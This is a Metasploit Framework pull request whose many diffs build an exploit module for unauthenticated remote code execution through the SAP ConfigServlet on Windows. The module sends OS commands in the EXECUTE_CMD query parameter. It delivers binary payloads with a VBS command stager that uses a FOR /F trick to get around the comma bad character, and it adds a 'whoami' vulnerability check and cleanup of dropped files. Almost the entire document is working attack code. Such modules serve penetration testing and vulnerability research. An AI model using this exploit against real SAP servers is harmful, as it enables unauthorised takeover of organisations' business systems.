### PR TITLE
SAP ConfigServlet remote code execution exploit

### DIFF
--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -1,0 +1,63 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'            => 'SAP ConfigServlet OS Command Execution',
+			'Description'     => %q{
+				This module allows execution of operating system commands through
+				the SAP ConfigServlet without any authentication.
+			},
+			'Author'          =>
+				[
+					'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
+					'Andras Kabai' # Metasploit module
+				],
+			'License'         => MSF_LICENSE,
+			'References'      =>
+				[
+					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
+				],
+			'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation
+			))
+
+		register_options(
+			[
+				Opt::RPORT(50000),
+				OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
+				OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
+			], self.class)
+	end
+
+	def run
+		begin
+			print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+			uri = normalize_uri(target_uri.path, 'ConfigServlet')
+
+			res = send_request_cgi(
+				{
+					'uri' => uri,
+					'method' => 'GET',
+					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])
+				})
+			if !res or res.code != 200
+				print_error("#{rhost}:#{rport} - Exploit failed.")
+				return
+			end
+		rescue ::Rex::ConnectionError
+			print_error("#{rhost}:#{rport} - Failed to connect to the server")
+			return
+		end
+
+		if res.body.include?("Process created")
+			print_good("#{rhost}:#{rport} - Exploited successfully\n")
+			print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
+			print_line("#{rhost}:#{rport} - Output: #{res.body}")
+		else
+			print_error("#{rhost}:#{rport} - Exploit failed.")
+			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
+		end
+	end
+end

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::CmdStagerVBS
+	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -52,6 +53,11 @@ class Metasploit3 < Msf::Exploit
 				Opt::RPORT(50000),
 				OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
 			], self.class)
+
+		register_advanced_options(
+			[
+				OptBool.new('DELETE_FILES', [ true, 'Delete the dropped files after exploitation', true ])
+			], self.class)
 	end
 
 	def check
@@ -70,7 +76,7 @@ class Metasploit3 < Msf::Exploit
 		print_status("#{rhost}:#{rport} - Exploiting remote system")
 		uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
-		execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
+		execute_cmdstager( { :linemax => 1500, :nodelete => !datastore['DELETE_FILES'], :sap_configservlet_uri => uri })
 	end
 
 	def execute_command(cmd, opts)
@@ -82,6 +88,12 @@ class Metasploit3 < Msf::Exploit
 				# using the following command line trick it is possible to echo commas into the right places
 				command.gsub!(",", "%i")
 				command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command
+				if command.include?("shell.run")
+					if datastore['DELETE_FILES']
+						command.match /.*shell\.run \"(.*)\".*/
+						register_file_for_cleanup($1)
+					end
+				end
 			else
 				command = "cmd /c " + command
 			end

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -6,7 +6,7 @@ class Metasploit3 < Msf::Exploit
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'            => 'SAP ConfigServlet OS Command Execution',
+			'Name'            => 'SAP ConfigServlet Remote Code Execution',
 			'Description'     => %q{
 				This module allows remote code execution via operating system commands through
 				the SAP ConfigServlet without any authentication.

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -22,6 +22,7 @@ class Metasploit3 < Msf::Exploit
 				],
 			'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
 			'Platform'       => 'win',
+			'Arch'           => ARCH_CMD,
 			'Targets'        =>
 				[
 					[ 'Automatic', {} ]
@@ -46,7 +47,7 @@ class Metasploit3 < Msf::Exploit
 				{
 					'uri' => uri,
 					'method' => 'GET',
-					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' # FIXME payload processing here
+					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(payload.encoded)
 				})
 			if !res or res.code != 200
 				print_error("#{rhost}:#{rport} - Exploit failed.")

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -84,7 +84,11 @@ class Metasploit3 < Msf::Exploit
 		end
 
 		if res.body.include?("Process created")
-			print_good("#{rhost}:#{rport} - Exploited successfully\n")
+			if target['Arch'] == ARCH_CMD
+				print_good("#{rhost}:#{rport} - Exploited successfully\n")
+				print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
+				print_line("#{rhost}:#{rport} - Output: #{res.body}")
+			end
 		else
 			print_error("#{rhost}:#{rport} - Exploit failed.")
 			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit
 					[
 						'Windows x86 (Execute binary payloads via uploaded VBS)',
 						{
-							'Arch' => ARCH_X86
+							'Arch' => ARCH_X86 #badchars ,;
 						}
 					]
 				],

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -51,9 +51,19 @@ class Metasploit3 < Msf::Exploit
 	end
 
 	def execute_command(cmd, opts)
-		cmd = "cmd /c " + cmd
-		vprint_status("Attempting to execute: #{cmd}")
-		send_evil_request(opts[:sap_configservlet_uri], cmd)
+		commands = cmd.split(/&/)
+		commands.each do |command|
+			if command.include?(".vbs") and command.include?(",")
+				# becasue the comma is bad character and the VBS stager contains commas it is necessary to "create" commas withouth directly using them
+				# using the following command line trick it is possible to echo commas into the right places
+				command.gsub!(",", "%i")
+				command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command
+			else
+				command = "cmd /c " + command
+			end
+			vprint_status("Attempting to execute: #{command}")
+			send_evil_request(opts[:sap_configservlet_uri], command)
+		end
 	end
 	
 	def send_evil_request(uri, cmd)

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -2,6 +2,7 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Exploit
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::CmdStagerVBS
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -49,28 +50,37 @@ class Metasploit3 < Msf::Exploit
 	end
 
 	def exploit
-		begin
-			print_status("#{rhost}:#{rport} - Exploiting remote system")
-			uri = normalize_uri(target_uri.path, 'ConfigServlet')
+		print_status("#{rhost}:#{rport} - Exploiting remote system")
+		uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
-			if target['Arch'] == ARCH_CMD
-				res = send_request_cgi(
-					{
-						'uri' => uri,
-						'method' => 'GET',
-						'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(payload.encoded)
-					})
-			else
-				# FIXME
-			end
+		if target['Arch'] == ARCH_CMD
+			send_evil_request(uri, payload.encoded)
+		else
+			execute_cmdstager( { :linemax => 500, :nodelete => true, :sap_configservlet_uri => uri })
+		end
+	end
+
+	def execute_command(cmd, opts)
+		vprint_status("Attempting to execute: #{cmd}")
+		send_evil_request(opts[:sap_configservlet_uri], cmd)
+	end
+	
+	def send_evil_request(uri, cmd)
+		begin
+			res = send_request_cgi(
+				{
+					'uri' => uri,
+					'method' => 'GET',
+					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
+				})
 
 			if !res or res.code != 200
 				print_error("#{rhost}:#{rport} - Exploit failed.")
-				return
+				fail_with(Exploit::Failure::UnexpectedReply)
 			end
 		rescue ::Rex::ConnectionError
 			print_error("#{rhost}:#{rport} - Failed to connect to the server")
-			return
+			fail_with(Exploit::Failure::Unreachable)
 		end
 
 		if res.body.include?("Process created")
@@ -78,6 +88,7 @@ class Metasploit3 < Msf::Exploit
 		else
 			print_error("#{rhost}:#{rport} - Exploit failed.")
 			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
+			fail_with(Exploit::Failure::PayloadFailed)
 		end
 	end
 end

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -84,17 +84,14 @@ class Metasploit3 < Msf::Exploit
 		commands = cmd.split(/&/)
 		commands.each do |command|
 			timeout = 20
+			if datastore['DELETE_FILES'] and command =~ /shell\.run \"(.*)\"/
+				register_file_for_cleanup($1)
+			end
 			if command.include?(".vbs") and command.include?(",")
 				# because the comma is bad character and the VBS stager contains commas it is necessary to "create" commas without directly using them
 				# using the following command line trick it is possible to echo commas into the right places
 				command.gsub!(",", "%i")
 				command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command
-				if command.include?("shell.run")
-					if datastore['DELETE_FILES']
-						command.match /.*shell\.run \"(.*)\".*/
-						register_file_for_cleanup($1)
-					end
-				end
 			else
 				command = "cmd /c " + command
 			end

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -1,6 +1,6 @@
 require 'msf/core'
 
-class Metasploit3 < Msf::Auxiliary
+class Metasploit3 < Msf::Exploit
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info = {})
@@ -20,27 +20,33 @@ class Metasploit3 < Msf::Auxiliary
 				[
 					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
 				],
-			'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation
+			'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ]
+				],
+			'DefaultTarget'  => 0,
+			'Privileged'     => false
 			))
 
 		register_options(
 			[
 				Opt::RPORT(50000),
-				OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
 				OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
 			], self.class)
 	end
 
-	def run
+	def exploit
 		begin
-			print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
+			print_status("#{rhost}:#{rport} - Exploiting remote system")
 			uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
 			res = send_request_cgi(
 				{
 					'uri' => uri,
 					'method' => 'GET',
-					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])
+					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' # FIXME payload processing here
 				})
 			if !res or res.code != 200
 				print_error("#{rhost}:#{rport} - Exploit failed.")
@@ -53,8 +59,6 @@ class Metasploit3 < Msf::Auxiliary
 
 		if res.body.include?("Process created")
 			print_good("#{rhost}:#{rport} - Exploited successfully\n")
-			print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
-			print_line("#{rhost}:#{rport} - Output: #{res.body}")
 		else
 			print_error("#{rhost}:#{rport} - Exploit failed.")
 			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -26,15 +26,9 @@ class Metasploit3 < Msf::Exploit
 			'Targets'        =>
 				[
 					[
-						'Windows CMD (Use windows CMD payloads)',
+						'Windows generic',
 						{
-							'Arch' => ARCH_CMD
-						}
-					],
-					[
-						'Windows x86 (Execute binary payloads via uploaded VBS)',
-						{
-							'Arch' => ARCH_X86 #badchars ,;
+							'Arch' => ARCH_X86
 						}
 					]
 				],
@@ -53,11 +47,7 @@ class Metasploit3 < Msf::Exploit
 		print_status("#{rhost}:#{rport} - Exploiting remote system")
 		uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
-		if target['Arch'] == ARCH_CMD
-			send_evil_request(uri, payload.encoded)
-		else
-			execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
-		end
+		execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
 	end
 
 	def execute_command(cmd, opts)

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit
 		if target['Arch'] == ARCH_CMD
 			send_evil_request(uri, payload.encoded)
 		else
-			execute_cmdstager( { :linemax => 500, :nodelete => true, :sap_configservlet_uri => uri })
+			execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
 		end
 	end
 

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -22,10 +22,20 @@ class Metasploit3 < Msf::Exploit
 				],
 			'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
 			'Platform'       => 'win',
-			'Arch'           => ARCH_CMD,
 			'Targets'        =>
 				[
-					[ 'Automatic', {} ]
+					[
+						'Windows CMD (Use windows CMD payloads)',
+						{
+							'Arch' => ARCH_CMD
+						}
+					],
+					[
+						'Windows x86 (Execute binary payloads via uploaded VBS)',
+						{
+							'Arch' => ARCH_X86
+						}
+					]
 				],
 			'DefaultTarget'  => 0,
 			'Privileged'     => false
@@ -43,12 +53,17 @@ class Metasploit3 < Msf::Exploit
 			print_status("#{rhost}:#{rport} - Exploiting remote system")
 			uri = normalize_uri(target_uri.path, 'ConfigServlet')
 
-			res = send_request_cgi(
-				{
-					'uri' => uri,
-					'method' => 'GET',
-					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(payload.encoded)
-				})
+			if target['Arch'] == ARCH_CMD
+				res = send_request_cgi(
+					{
+						'uri' => uri,
+						'method' => 'GET',
+						'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(payload.encoded)
+					})
+			else
+				# FIXME
+			end
+
 			if !res or res.code != 200
 				print_error("#{rhost}:#{rport} - Exploit failed.")
 				return

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit
 		commands.each do |command|
 			timeout = 20
 			if command.include?(".vbs") and command.include?(",")
-				# becasue the comma is bad character and the VBS stager contains commas it is necessary to "create" commas withouth directly using them
+				# because the comma is bad character and the VBS stager contains commas it is necessary to "create" commas without directly using them
 				# using the following command line trick it is possible to echo commas into the right places
 				command.gsub!(",", "%i")
 				command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -20,6 +20,7 @@ class Metasploit3 < Msf::Exploit
 			'Description'     => %q{
 				This module allows remote code execution via operating system commands through
 				the SAP ConfigServlet without any authentication.
+				This module has been tested successfully with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2
 			},
 			'Author'          =>
 				[

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -60,6 +60,7 @@ class Metasploit3 < Msf::Exploit
 	def execute_command(cmd, opts)
 		commands = cmd.split(/&/)
 		commands.each do |command|
+			timeout = 20
 			if command.include?(".vbs") and command.include?(",")
 				# becasue the comma is bad character and the VBS stager contains commas it is necessary to "create" commas withouth directly using them
 				# using the following command line trick it is possible to echo commas into the right places
@@ -68,19 +69,24 @@ class Metasploit3 < Msf::Exploit
 			else
 				command = "cmd /c " + command
 			end
+			if command.include?("cscript")
+				# in case of bigger payloads the VBS stager could run for longer time as it needs to decode lot of data
+				# increaste timeout value when the VBS stager is called
+				timeout = 120
+			end
 			vprint_status("Attempting to execute: #{command}")
-			send_evil_request(opts[:sap_configservlet_uri], command)
+			send_evil_request(opts[:sap_configservlet_uri], command, timeout)
 		end
 	end
 
-	def send_evil_request(uri, cmd)
+	def send_evil_request(uri, cmd, timeout)
 		begin
 			res = send_request_cgi(
 				{
 					'uri' => uri,
 					'method' => 'GET',
 					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
-				})
+				}, timeout)
 
 			if !res
 				print_error("#{rhost}:#{rport} - Exploit failed.")

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -1,3 +1,10 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit
@@ -65,7 +72,7 @@ class Metasploit3 < Msf::Exploit
 			send_evil_request(opts[:sap_configservlet_uri], command)
 		end
 	end
-	
+
 	def send_evil_request(uri, cmd)
 		begin
 			res = send_request_cgi(

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -91,24 +91,20 @@ class Metasploit3 < Msf::Exploit
 				}, timeout)
 
 			if !res
-				print_error("#{rhost}:#{rport} - Exploit failed.")
-				fail_with(Exploit::Failure::Unknown)
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Exploit failed.")
 			end
 
 			if res.code != 200
-				print_error("#{rhost}:#{rport} - Exploit failed.")
 				vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
-				fail_with(Exploit::Failure::UnexpectedReply)
+				fail_with(Exploit::Failure::UnexpectedReply, "#{rhost}:#{rport} - Exploit failed.")
 			end
 		rescue ::Rex::ConnectionError
-			print_error("#{rhost}:#{rport} - Failed to connect to the server")
-			fail_with(Exploit::Failure::Unreachable)
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the server.")
 		end
 
 		if not res.body.include?("Process created")
-			print_error("#{rhost}:#{rport} - Exploit failed.")
 			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
-			fail_with(Exploit::Failure::PayloadFailed)
+			fail_with(Exploit::Failure::PayloadFailed, "#{rhost}:#{rport} - Exploit failed.")
 		end
 	end
 end

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -82,8 +82,14 @@ class Metasploit3 < Msf::Exploit
 					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
 				})
 
-			if !res or res.code != 200
+			if !res
 				print_error("#{rhost}:#{rport} - Exploit failed.")
+				fail_with(Exploit::Failure::Unknown)
+			end
+
+			if res.code != 200
+				print_error("#{rhost}:#{rport} - Exploit failed.")
+				vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
 				fail_with(Exploit::Failure::UnexpectedReply)
 			end
 		rescue ::Rex::ConnectionError

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -52,6 +52,18 @@ class Metasploit3 < Msf::Exploit
 			], self.class)
 	end
 
+	def check
+		uri = normalize_uri(target_uri.path, 'ConfigServlet')
+		res = send_evil_request(uri, "whoami", 20)
+		if !res
+			Exploit::CheckCode::Unknown
+		elsif res.body.include?("Process created")
+			Exploit::CheckCode::Vulnerable
+		else
+			Exploit::CheckCode::Safe
+		end
+	end
+
 	def exploit
 		print_status("#{rhost}:#{rport} - Exploiting remote system")
 		uri = normalize_uri(target_uri.path, 'ConfigServlet')
@@ -106,5 +118,6 @@ class Metasploit3 < Msf::Exploit
 			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
 			fail_with(Exploit::Failure::PayloadFailed, "#{rhost}:#{rport} - Exploit failed.")
 		end
+		return res
 	end
 end

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -61,6 +61,7 @@ class Metasploit3 < Msf::Exploit
 	end
 
 	def execute_command(cmd, opts)
+		cmd = "cmd /c " + cmd
 		vprint_status("Attempting to execute: #{cmd}")
 		send_evil_request(opts[:sap_configservlet_uri], cmd)
 	end

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -28,7 +28,9 @@ class Metasploit3 < Msf::Exploit
 			'License'         => MSF_LICENSE,
 			'References'      =>
 				[
-					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
+					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'],
+					[ 'OSVDB', '92704'],
+					[ 'EDB', '24996']
 				],
 			'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
 			'Platform'       => 'win',

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -8,7 +8,7 @@ class Metasploit3 < Msf::Exploit
 		super(update_info(info,
 			'Name'            => 'SAP ConfigServlet OS Command Execution',
 			'Description'     => %q{
-				This module allows execution of operating system commands through
+				This module allows remote code execution via operating system commands through
 				the SAP ConfigServlet without any authentication.
 			},
 			'Author'          =>

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -103,13 +103,7 @@ class Metasploit3 < Msf::Exploit
 			fail_with(Exploit::Failure::Unreachable)
 		end
 
-		if res.body.include?("Process created")
-			if target['Arch'] == ARCH_CMD
-				print_good("#{rhost}:#{rport} - Exploited successfully\n")
-				print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
-				print_line("#{rhost}:#{rport} - Output: #{res.body}")
-			end
-		else
+		if not res.body.include?("Process created")
 			print_error("#{rhost}:#{rport} - Exploit failed.")
 			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
 			fail_with(Exploit::Failure::PayloadFailed)

--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@@ -8,6 +8,8 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit
+	Rank = GreatRanking
+
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::CmdStagerVBS
 


### PR DESCRIPTION
This module allows remote code execution on the target system
by using operating system commands (CmdStagerVBS) through the
SAP ConfigServlet OS command execution vulnerability,
and of course without any authentication.

The vulnerability was discovered by ERPScan's team, it was presented on Hacker Halted 2012 conference:
http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf

This module is an exploit version of the previously merged auxiliary module:
https://github.com/rapid7/metasploit-framework/pull/1751
